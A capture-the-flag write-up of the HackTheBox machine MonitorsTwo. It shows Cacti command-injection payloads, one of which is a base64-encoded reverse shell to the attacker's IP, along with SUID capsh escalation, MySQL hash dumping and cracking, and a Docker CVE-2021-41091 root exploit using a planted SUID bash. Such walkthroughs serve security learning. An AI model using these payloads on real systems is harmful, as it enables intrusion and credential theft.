# MonitorsTwo - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

MonitorsTwo is a delightful, easy-rated HTB machine created by [TheCyberGeek](https://twitter.com/thecybergeek19)

An unauthenticated RCE in Cacti leads to foothold on this box, inside a container.  
SUID bit on `capsh` can be abused to escalate privileges inside the container.  
User credentials for host can be extracted from a MySQL database.  
Root involves exploiting CVE-2021-41091, a vulnerability in docker engine due to insufficiently restricted permissions.

## Initial recon

```console
opcode@parrot$ nmap -v -p- --min-rate 2000 10.10.11.211
Nmap scan report for 10.10.11.211
Host is up (0.15s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN monitorstwo.nmap 10.10.11.211
Nmap scan report for 10.10.11.210
Host is up (0.16s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The usual SSH (22) and HTTP (80) ports are open.

Visiting <http://10.10.11.211/> in a browser took me to Cacti login page:

![1](images/1.png)

It discloses the version: 1.2.22

## Unauthenticated RCE in Cacti

Even before the box was released, some of my friends had predicted CVE-2022-46169 for it.  
They reasoned was that the `Monitors` box also utilized Cacti. Furthermore, the CVE was [disclosed by SonarSource](https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/), and several TCG boxes include vulnerabilities disclosed by SonarSource.

Therefore, I considered getting a local vulnerable instance of Cacti to play around with.  
[Vulhub](https://github.com/vulhub/vulhub) did have a vulnerable docker environment.  
Not only that, they also featured the working payload for this vulnerability.  
I noted the payload, but never got the local instance; it seemed too much work for an easy box.  
That payload ended up working on the box without any changes:

```console
opcode@parrot$ curl -H 'X-Forwarded-For: 127.0.0.1' 'http://10.10.11.211/remote_agent.php?action=polldata&local_data_ids\[0\]=6&host_id=1&poller_id=`curl+10.10.14.20:8000`'
```

To get a reverse shell, I used:

```console
opcode@parrot$ curl -H 'X-Forwarded-For: 127.0.0.1' 'http://10.10.11.211/remote_agent.php?action=polldata&local_data_ids\[0\]=6&host_id=1&poller_id=`echo+YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjAvOTAwMSAgMD4mMScK|base64+-d|bash`'
```

Python is not available on the box. To stabilize the shell, I used `script`:

```console
www-data@50bca5e748b0:/tmp$ script /dev/null -c bash
www-data@50bca5e748b0:/tmp$ ^Z
opcode@parrot$ stty raw -echo; fg
www-data@50bca5e748b0:/tmp$ export TERM=xterm-256color
www-data@50bca5e748b0:/tmp$ exec /bin/bash
```

## Privilege escalation with SUID `capsh`

After getting a stable shell, I transferred [linpeas.sh](https://github.com/carlospolop/PEASS-ng) to the box and executed it.  
There is an interesting SUID binary:

```console
www-data@50bca5e748b0:/tmp$ find / -perm /u=s 2>/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/sbin/capsh
/bin/mount
/bin/umount
/bin/su
```

`capsh` has a GTFObins entry to escalate privileges if the SUID bit is set:

```console
www-data@50bca5e748b0:/tmp$ capsh --gid=0 --uid=0 --
root@50bca5e748b0:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
```

The `@50bca5e748b0` part in prompt hints that it is a docker container. To confirm that, I looked at `/proc/self/cgroup`.

## Container-related enumeration

I tried using [miniss](https://github.com/noraj/miniss):

```console
root@50bca5e748b0:/tmp# chmod +x miniss 
root@50bca5e748b0:/tmp# ./miniss 
type local address    remote address   state       username (uid)
tcp  0.0.0.0:80       0.0.0.0:0        LISTEN      root (0)
tcp  127.0.0.11:33969 0.0.0.0:0        LISTEN      root (0)
tcp  172.19.0.3:80    172.19.0.1:48678 CLOSE_WAIT  www-data (33)
tcp  172.19.0.3:58324 172.19.0.2:3306  ESTABLISHED www-data (33)
tcp  172.19.0.3:55538 10.10.14.20:9001 ESTABLISHED www-data (33)
udp  127.0.0.11:53726 0.0.0.0:0        CLOSE       root (0)
```

```console
root@50bca5e748b0:/tmp# hostname -i
172.19.0.3
```

It means we have another container with MySQL running on it: 172.19.0.2  
Cacti must be using this database, and there should be credentials somewhere.  
I tried to look for credentials with [duroc_hog](https://github.com/newrelic/rusty-hog):

```console
www-data@50bca5e748b0:/tmp$ ./duroc_hog /var/www/html/
```

The output was an undecipherable mess. I tried using the `--norecursive` option:

```console
www-data@50bca5e748b0:/tmp$ ./duroc_hog /var/www/html/ --norecursive
[{"stringsFound":["root@cacti.net'"],"path":"/var/www/html/poller_automation.php","reason":"Email address","linenum":967,"diff":"\t\t\t\t\t\t$fromemail = 'root@cacti.net';"}]
```

Nothing useful was found.  
Since I have root, I can read the `entrypoint.sh` for this container:

```console
root@50bca5e748b0:/# cat entrypoint.sh 
#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi

chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
	set -- apache2-foreground "$@"
fi

exec "$@"
```

It contains the db credentials `root:root`; they can be used to explore the database:

```console
root@50bca5e748b0:/# mysql --host=db --user=root --password=root cacti
```

```console
MySQL [cacti]> show tables;
+-------------------------------------+
| Tables_in_cacti                     |
+-------------------------------------+
| aggregate_graph_templates           |
| aggregate_graph_templates_graph     |
| aggregate_graph_templates_item      |
| aggregate_graphs                    |
| aggregate_graphs_graph_item         |
| aggregate_graphs_items              |
| automation_devices                  |
| automation_graph_rule_items         |
| automation_graph_rules              |
| automation_ips                      |
| automation_match_rule_items         |
| automation_networks                 |
| automation_processes                |
| automation_snmp                     |
| automation_snmp_items               |
| automation_templates                |
| automation_tree_rule_items          |
| automation_tree_rules               |
| cdef                                |
| cdef_items                          |
| color_template_items                |
| color_templates                     |
| colors                              |
| data_debug                          |
| data_input                          |
| data_input_data                     |
| data_input_fields                   |
| data_local                          |
| data_source_profiles                |
| data_source_profiles_cf             |
| data_source_profiles_rra            |
| data_source_purge_action            |
| data_source_purge_temp              |
| data_source_stats_daily             |
| data_source_stats_hourly            |
| data_source_stats_hourly_cache      |
| data_source_stats_hourly_last       |
| data_source_stats_monthly           |
| data_source_stats_weekly            |
| data_source_stats_yearly            |
| data_template                       |
| data_template_data                  |
| data_template_rrd                   |
| external_links                      |
| graph_local                         |
| graph_template_input                |
| graph_template_input_defs           |
| graph_templates                     |
| graph_templates_gprint              |
| graph_templates_graph               |
| graph_templates_item                |
| graph_tree                          |
| graph_tree_items                    |
| host                                |
| host_graph                          |
| host_snmp_cache                     |
| host_snmp_query                     |
| host_template                       |
| host_template_graph                 |
| host_template_snmp_query            |
| plugin_config                       |
| plugin_db_changes                   |
| plugin_hooks                        |
| plugin_realms                       |
| poller                              |
| poller_command                      |
| poller_data_template_field_mappings |
| poller_item                         |
| poller_output                       |
| poller_output_boost                 |
| poller_output_boost_local_data_ids  |
| poller_output_boost_processes       |
| poller_output_realtime              |
| poller_reindex                      |
| poller_resource_cache               |
| poller_time                         |
| processes                           |
| reports                             |
| reports_items                       |
| sessions                            |
| settings                            |
| settings_tree                       |
| settings_user                       |
| settings_user_group                 |
| sites                               |
| snmp_query                          |
| snmp_query_graph                    |
| snmp_query_graph_rrd                |
| snmp_query_graph_rrd_sv             |
| snmp_query_graph_sv                 |
| snmpagent_cache                     |
| snmpagent_cache_notifications       |
| snmpagent_cache_textual_conventions |
| snmpagent_managers                  |
| snmpagent_managers_notifications    |
| snmpagent_mibs                      |
| snmpagent_notifications_log         |
| user_auth                           |
| user_auth_cache                     |
| user_auth_group                     |
| user_auth_group_members             |
| user_auth_group_perms               |
| user_auth_group_realm               |
| user_auth_perms                     |
| user_auth_realm                     |
| user_domains                        |
| user_domains_ldap                   |
| user_log                            |
| vdef                                |
| vdef_items                          |
| version                             |
+-------------------------------------+
```

`user_auth` is the table of interest.

```console
MySQL [cacti]> select username,password,email_address from user_auth;
+----------+--------------------------------------------------------------+------------------------+
| username | password                                                     | email_address          |
+----------+--------------------------------------------------------------+------------------------+
| admin    | $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC | admin@monitorstwo.htb  |
| guest    | 43e9a4ab75570f5b                                             |                        |
| marcus   | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C | marcus@monitorstwo.htb |
+----------+--------------------------------------------------------------+------------------------+
```

I tried cracking them with `john`:

```console
opcode@parrot$ john/john --wordlist=/home/opcode/CTF/wordlists/rockyou.txt hash
```

After 3 minutes or so, the password for `marcus` cracks:

```
marcus:funkymonkey
```

It works on the Cacti interface as well as on SSH:

```console
opcode@parrot$ sshpass -p 'funkymonkey' ssh -o StrictHostKeyChecking=no marcus@10.10.11.211
```

## Finding the mail

Once again, I executed [linpeas.sh](https://github.com/carlospolop/PEASS-ng).  
It found mail:

```console
marcus@monitorstwo:~$ cat /var/mail/marcus 
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Administrator
CISO
Monitor Two
Security Team
```

They point to three potential CVEs that could potentially be used to get root.  
The first one, `CVE-2021-33033` is a kernel UAF vulnerability; something like that on an easy-rated machine is unthinkable.  
The second one, `CVE-2020-25706` affects Cacti 1.2.13, but Cacti instance on this box is version 1.2.22.  
That leaves us with the last Docker vulnerability.

## Exploiting docker with CVE-2021-41091

When I did the box in release arena, no public PoC for that exploit was available.  
I started with the description of the project:

Moby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where the data directory (typically /var/lib/docker) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files. This bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers should be stopped and restarted for the permissions to be fixed. For users unable to upgrade limit access to the host to trusted users. Limit access to host volumes to trusted containers.

All the changes in the patch commit were along the lines of:

```diff
-	return idtools.MkdirAllAndChown(p, 0701, idtools.CurrentIdentity())
+	return idtools.MkdirAllAndChown(p, 0710, idtools.Identity{UID: idtools.CurrentIdentity().UID, GID: daemon.IdentityMapping().RootPair().GID})
```

I tried listing `/var/lib/docker` but failed:

```console
marcus@monitorstwo:~$ ls /var/lib/docker
ls: cannot open directory '/var/lib/docker': Permission denied
```

I created an arbitrary docker container on my VM to explore, as I am unrestricted on my own machine.  
In fact, my docker version was horribly old and vulnerable :sweat_smile:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/sh --name python311 python:latest
```

```console
opcode@parrot$ sudo su
root@parrot# ls /var/lib/docker
btrfs     containers  network  runtimes  tmp    volumes
buildkit  image       plugins  swarm     trust
```

`containers` looked interesting, so I looked inside:

```console
root@parrot# ls /var/lib/docker/containers/
d004281568f637cef270998339c966d2ad7d7e140e49d39a94f63e03edd69080
root@parrot# ls /var/lib/docker/containers/d004281568f637cef270998339c966d2ad7d7e140e49d39a94f63e03edd69080/
checkpoints
config.v2.json
d004281568f637cef270998339c966d2ad7d7e140e49d39a94f63e03edd69080-json.log
hostconfig.json
hostname
hosts
mounts
resolv.conf
resolv.conf.hash
```

Some of them are recognizable linux files. Checking their contents, I learnt that those are the files from the container.  
Next, I tried changing the contents of `/etc/hosts` inside the container, and the change was reflected on `/var/lib/docker/containers/d004281568f637cef270998339c966d2ad7d7e140e49d39a94f63e03edd69080/hosts`.  
Similarly, I tried changing permissions of `/etc/hosts` and the permissions for `/var/lib/docker/containers/d004281568f637cef270998339c966d2ad7d7e140e49d39a94f63e03edd69080/hosts` got changed as well.

Next, I wanted to see which of these steps could be replicated on remote.  
First things first, to get the full container ID, I used `/proc/self/cgroup`:

```console
root@50bca5e748b0:/root# cat /proc/self/cgroup 
12:devices:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
11:perf_event:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
10:memory:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
9:freezer:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
8:net_cls,net_prio:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
7:pids:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
6:cpu,cpuacct:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
5:blkio:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
4:cpuset:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
3:rdma:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
2:hugetlb:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
1:name=systemd:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
0::/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
```

Next, I tried reading `hosts` file inside:

```console
marcus@monitorstwo:~$ cat /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
127.0.0.1   localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.19.0.3  50bca5e748b0
```

After that, I edited `/etc/hosts` inside the container:

```console
root@50bca5e748b0:/# echo '# opcodewashere' >> /etc/hosts
```

Reading the `hosts` file from the docker host now:

```console
marcus@monitorstwo:~$ cat /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
127.0.0.1   localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.19.0.3  50bca5e748b0
# opcodewashere
```

It's working. I replaced the `/etc/hostname` file with `bash` and gave it SUID permission:

```console
root@50bca5e748b0:/# cp /bin/bash /etc/hostname
root@50bca5e748b0:/# chmod +rwx /etc/hostname
root@50bca5e748b0:/# chmod +s /etc/hostname
```

And from the docker host:

```console
marcus@monitorstwo:~$ ls -la /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname
-rwsr-sr-x 1 root root 1234376 Sep 14 14:22 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname
```

As expected, the SUID bit is set. I used it to get root:

```console
marcus@monitorstwo:~$ /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname -p
hostname-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) egid=0(root) groups=0(root),1000(marcus)
```
